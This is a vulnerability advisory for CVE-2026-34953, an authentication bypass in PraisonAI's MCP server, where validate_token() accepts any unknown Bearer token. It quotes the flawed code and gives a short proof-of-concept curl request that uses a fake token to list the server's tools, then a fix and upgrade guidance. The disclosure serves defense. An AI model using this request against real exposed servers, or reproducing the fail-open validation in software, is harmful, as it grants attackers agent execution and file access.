CVE-2026-34953: PraisonAI: Authentication Bypass in OAuthManager.validate_token()
Summary
OAuthManager.validatetoken() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is treated as authenticated, granting full access to all registered tools and agent capabilities.
Details
oauth.py:364 (source) -> oauth.py:374 (loop miss) -> oauth.py:381 (sink) python source def validatetoken(self, token: str) -> bool: for storedtoken in self.tokens.values(): if storedtoken.accesstoken == token: return not storedtoken.isexpired()
sink -- tokens is empty by default, loop never executes, falls through return True
PoC bash install: pip install -e src/praisonai start server: praisonai mcp serve --transport http-stream --port 8080
curl -s -X POST http://127.0.0.1:8080/mcp \ -H "Authorization: Bearer faketokenabc123" \ -H "Content-Type: application/json" \ -d '{"jsonrpc":"2.0","method":"tools/list","id":1}'
expected output: 200 OK with full tool list (50+ tools) including praisonai.agent.run, praisonai.workflow.run, praisonai.containers.filewrite
Impact
Any unauthenticated attacker with network access to the MCP HTTP server can call all registered tools including agent execution, workflow runs, container file read/write, and skill loading. The server binds to 0.0.0.0 by default with no API key required.
Suggested Fix python def validatetoken(self, token: str) -> bool: for storedtoken in self.tokens.values(): if storedtoken.accesstoken == token: return not storedtoken.isexpired() # Unknown tokens must be rejected. # For external/JWT tokens, call the introspection endpoint here before returning. return False
Other sources
PraisonAI is a multi-agent teams system. Prior to version 4.5.97, OAuthManager.validatetoken() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is treated as authenticated, granting full access to all registered tools and agent capabilities. This issue has been patched in version 4.5.97.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/praisonaito a version that resolves this vulnerability.Fixed in 4.5.97 - Upgrade
Upgrade
PraisonAIto a version that resolves this vulnerability.Fixed in 4.5.97 - Compensating control
Do not expose the MCP server publicly: bind/access control should prevent unauthenticated attackers from reaching the MCP HTTP server (the server binds to 0.0.0.0 by default with no API key required).